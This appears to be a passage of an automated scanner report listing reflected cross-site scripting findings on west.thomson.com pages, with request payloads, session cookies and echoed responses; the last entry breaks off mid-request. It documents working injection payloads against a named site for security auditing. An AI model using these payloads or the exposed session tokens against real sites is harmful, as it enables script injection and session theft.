Set-Cookie: .WTCAUTH=7C4CE5D28CD27E0D162AF2DADB7CD21AEEAA5F973E30999D1E5A4D12D1E7A8BEE05072991099E4B273E84DC94EF7E2D0ECC8C35F3617EDAA6A78BA5DC99CC24F42A9600AD357B60FE259BA5BB686DC1398365CC6D645DECDC1274E7B64CC02E49984AB3435433883913BE5EA2DE24ECA406761F721A8C0B65091A5961EBD3F5B157F183961120E5B3F35143659B8294DAF1E04123667BA68CE04C9E0F270C0202EB4A9AF77961D42103E9A9FE448DBF40E4181CE35E14A6F1609E7BFCA13B5508749B6651E34DF0147D9DAFF146A52C5A3595FFC96142DA196B03953FEE825AFE4DE1131; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90968


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
a class="EmailPrintContactUsLink" href="javascript:void(0);"
onclick="javascript:PrintThisPage('http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation970be"style="x:expression(alert(1))"b6e0c02100b'); return false;" >
...[SNIP]...

5.176. http://west.thomson.com/support/contact-us/default.aspx [FindingMethod parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The value of the FindingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3b99"%3balert(1)//ee36c302041 was submitted in the FindingMethod parameter. This input was echoed as c3b99";alert(1)//ee36c302041 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigationc3b99"%3balert(1)//ee36c302041 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:20:07 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=DA5F527D77095D4E2E7CE1C2E779C0AC51DE6EC75612A9D896AB254F4AC968936082E431775F60E4A9FEC758C7B379B7E9C148FDE7C42E377EC2B94717F34826D37B70C37592A9E326757129576936CF4E5696C22244AF81FCE5CB09ED7602BBCDFB8B9D8BE44DB6B3D1E0E5B294F2E4CBB2303395345B4876632E75245D7E1BDFA1B746DB7B797429DB04AE73B27D0457BD88A682D2CB17C9277B4DF1B0ABC802BC49FDD798F957B2237E83946179DD21D86221CDF3C178A0A3500EB93FF8A840031DDC3926FD0BE588DFBEEF73F6CCA6A46FA61962F170913EC3AB2309DCA46E4E495B; expires=Tue, 26-Apr-2011 20:50:06 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=119B4AA3E7CEF4EE0AC1814985A55E353BAD075BE0EDAB462A85EDE33A9D2ED13D7DBC682CF383E6B8A0F5C95CB3C9CED8DCC5BD767D602A10A7001F04B3C262AD734462DF868F31DCC91DE5353DF87B9618E146A3B7214DA03827251D450B59409F3511481CED0983309492156BED4F1FEF312458F0F6C95EE148C6A1D8F7CE4BE754A2154C8755497A8BB71FE009BC07B22C6AB3F4127F28DA58249113F28376A44DC053E6AAC2FBA81B3BE8E3BC0B38FEE96AD1A6B8F747B3E076747B6481F336006ADA46B431539CE6673FB1569DF55B1092CA333F9AF67C8558BFB787EB33F51883; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...

s.prop8=""
s.prop9=""
s.prop10=""
s.prop11=""
s.prop12=""
s.prop13=""
s.prop14=""
s.prop15=""
s.prop16=""
s.prop17=""
s.prop18=""
s.prop19=""
s.prop20=""
s.prop21=""
s.prop22="Navigationc3b99";alert(1)//ee36c302041"
s.prop23=""
s.prop24=""
s.prop25=""
s.prop26=""
s.prop27="Customer Support"
s.prop28="Contact Us"
s.prop29="Category"
s.prop38=""
/* E-commerce Variables */
s.campaign=""
s.state=""
s.zip
...[SNIP]...

5.177. http://west.thomson.com/support/contact-us/default.aspx [PromCode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The value of the PromCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a66"style%3d"x%3aexpression(alert(1))"2617e1b896b was submitted in the PromCode parameter. This input was echoed as a8a66"style="x:expression(alert(1))"2617e1b896b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /support/contact-us/default.aspx?PromCode=571422a8a66"style%3d"x%3aexpression(alert(1))"2617e1b896b&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:13:05 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=000369DA4A9132554090A7233C8C4843EF17B236BAD3E6EBEA65A8BB0CD2D741506E1421320162A52C3A2A32D9E1279D4B28EC80DE7E9C56A85F6653EAF311A8A70E77BB35F8AFC5922187B9DA5EBFA8BC893AC9D5AF5F3782803FF4909E128E73211A5FC2474F05FA11998DA539BDEF4CE8924724B322089DD11F6FF8957EC4FD085D0E19D914BFC251ACF4C072441E19782B93C32BE38086DCBE32BFF68F2FBC79B02A28E183792BA967437A71EAE07588FE59F65575F0BCDF54EB51520909B86D445EFC3AB2E03332C1CBBB00D37D72DCDFCD215FEF9746931347CC83D4654FE0DECC; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90921


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
<a class="EmailPrintContactUsLink" href="javascript:void(0);"
onclick="javascript:PrintThisPage('http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422a8a66"style="x:expression(alert(1))"2617e1b896b&FindingMethod=Navigation'); return false;" >
...[SNIP]...

5.178. http://west.thomson.com/support/contact-us/default.aspx [PromCode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The value of the PromCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbbd9"%3balert(1)//e1045719b6a was submitted in the PromCode parameter. This input was echoed as cbbd9";alert(1)//e1045719b6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /support/contact-us/default.aspx?PromCode=571422cbbd9"%3balert(1)//e1045719b6a&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:14:31 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=B5FF2FD0008E83983E00226255A78F21FAA1BC74A78401487F2215DBA44FD3F456976C25CBE9328D216388040278635360938504ADEEBEBEBBDBD2CC39F9B0511B2A66AE979489ED5CBBA08562C2A311FB06A1D0942DD9717FA9E2E0ECBE2F3A8399171FCF52F4401BE9A284D00268CFB8526C03E8BB950EA2191372E82E286F69067BA84001E3EBEE376077985B6B371B92A1320FA3BE317E63DBE1DE2B8B6F72F71F1FA88AB7C3429F9D0E1363E7525D795CF2F879016CB2990E3DD9B88615C1435A3C3E306212B817339FD3679B39180F26487343BD72D47EC86023C2D688CC3A9A8B; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90812


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
<script language="JavaScript">
s.pageName="support:contact-us:default"
s.server="EG-SWGWEB-B01"
s.channel="Standard"
s.pageType=""
s.prop1="571422cbbd9";alert(1)//e1045719b6a"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop9=""
s.prop10=""
s.prop11=""
s.prop12=""
s.prop13=""
s.prop14=""
s.prop15=""
s.prop16=""
s.prop17=""
...[SNIP]...

5.179. http://west.thomson.com/support/contact-us/default.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /support/contact-us/default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fdea"style%3d"x%3aexpression(alert(1))"22c4a465138 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8fdea"style="x:expression(alert(1))"22c4a465138 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation&8fdea"style%3d"x%3aexpression(alert(1))"22c4a465138=1 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:36:50 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 90894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
class="EmailPrintContactUsLink" href="javascript:void(0);"
onclick="javascript:PrintThisPage('http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation&8fdea"style="x:expression(alert(1))"22c4a465138=1'); return false;" >
...[SNIP]...

5.180. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [FindingMethod parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/Promotions/EmailPreferences/Login.aspx

Issue detail

The value of the FindingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54b8b"%3balert(1)//787512fed9c was submitted in the FindingMethod parameter. This input was echoed as 54b8b";alert(1)//787512fed9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation54b8b"%3balert(1)//787512fed9c HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:19:23 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=02C7CBCD3A55EA9D27EB48E3569CAAC75DD12D0163E2A96333E37FCB92A89FEF22C4CDA18B63632293AFEC4F9CFD9C9C97E5682A7E60915FAFE192F03575061A2C1F7D23CCA0E7ED605E5F5492180F4426EFF8A8783D7A5E3381ECAE88D68155FBEACC8E2DB7BD8240E1093D7DDB51C0888024E7EB20CDB935C5FCC0F5D92DB1CC5DCB37E7C43A7D6F70F845E5734B30C7F12D40B5DFFBB8E01E6F438077AE71F0FE7F41C48E13EDD3F02AACF65617502C96EB6EC12E55699539259D0C264204C410CDAD3E75333C6721A7A6E6E94D6AA711D0C756D8E790683D527B3A2C30135392CEA3; expires=Tue, 26-Apr-2011 20:49:18 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=414B02C5FC8E636C3842D4E8FB2372CAB30A2B20D50B5F64F0864744264CC3321EE01EB9F8ECEFEFF72029FB375BC1EE012B3C3CB5BD9084715C8557C0195E468F8D058B79FF0FA94B651F6BA4D955161968DD96B238CF4BA68FA87855F6280BBC307E13A3A869A3F22834DF744FD3EF61E895A6BDD889522E126D0F79E1B51ECFC721C2612227EE07A17FAB126B1ED6F3DB4C601A1A5885C9CD6F6FA589BF4774CF9D406ED0F26CAD669AC1C6CF18A98465B4573A6F6B0B3B38E7B68FBE5819CDD10DB57EBF972D5551EEC0D374718621BC73ED4771BA20AF903833569BC0950443C88C; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

s.prop8=""
s.prop9=""
s.prop10=""
s.prop11=""
s.prop12=""
s.prop13=""
s.prop14=""
s.prop15=""
s.prop16=""
s.prop17=""
s.prop18=""
s.prop19=""
s.prop20=""
s.prop21=""
s.prop22="Navigation54b8b";alert(1)//787512fed9c"
s.prop23=""
s.prop24=""
s.prop25=""
s.prop26=""
s.prop27=""
s.prop28=""
s.prop29=""
s.prop38=""
/* E-commerce Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""

s.products=""
...[SNIP]...

5.181. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx [PromCode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/Promotions/EmailPreferences/Login.aspx

Issue detail

The value of the PromCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 749d9"%3balert(1)//72d68614b4 was submitted in the PromCode parameter. This input was echoed as 749d9";alert(1)//72d68614b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419749d9"%3balert(1)//72d68614b4&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:16:23 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=4B92D06C1055BF1CDDBBBACB727FD4F43428482F7C563F0EA97F18B91DD9FD3F138B25C98AA96EBA38EDBC1589BA5D26B61808A57D0181247B61D3532602037BA027D5FCE7F6BE62C519A918C3C48B8A8A8D9BDF2BBF4D4EB2E67EAB361D4FD27CC98B24F6589E3D21287619AAA5AC80D7930280A1D86B07F463F3D62E9EECB79DED2B0B5C061287C1FD67F659A7EC02250606ED60FF5F38EB6D84D0F8F3B50821A280C3EF0E9122D3E78CAA9F50376CFBE7131D01B384AD1A9DB7762AC4912A915968CF8A1C156573D216989DE281CE5CE92FA4E43EF9F86851E9360F38B8EF61D571C0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69784


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<script language="JavaScript">
s.pageName="store:promotions:emailpreferences:login"
s.server="EG-SWGWEB-A02"
s.channel="Standard"
s.pageType=""
s.prop1="571419749d9";alert(1)//72d68614b4"
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6=""
s.prop7=""
s.prop8=""
s.prop9=""
s.prop10=""
s.prop11=""
s.prop12=""
s.prop13=""
s.prop14=""
s.prop15=""
s.prop16=""
s.prop17=""
...[SNIP]...

5.182. https://west.thomson.com/support/customer-service/order-info.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /support/customer-service/order-info.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8613a"style%3d"x%3aexpression(alert(1))"bb1d1f56e32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8613a"style="x:expression(alert(1))"bb1d1f56e32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /support/customer-service/order-info.aspx?8613a"style%3d"x%3aexpression(alert(1))"bb1d1f56e32=1 HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=E76869171E1A0ADDDC87DE0666682051A5ABA524C2901C7CCEF31A6788A7A438C98C00E7ABD27B50057AA9B35AF82318BE32CAAF21BCE46BA3E3E2EF6BAD7265022CF6605B0D106AF37CB15E717B49BE7FA125545B49CD98D1796358E96925E259D28F2A8CB5B16681BF5B9DE5EB533CEFC7E936BC98024D18199973772A2B0420054643FF9639F13C27CBBB80C1152B2BC7EF70BDEC6C72A6C3ED2F16912510EBC9C641BEB2DCBD2784D94A08DAC3A2CB0C92EBE86CA6DAE5A52262E83175C215F1D237D9058600C65D041AC94F24F8BD7FAFEA186A82F05284BBAB97540DA15E7C4840; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; 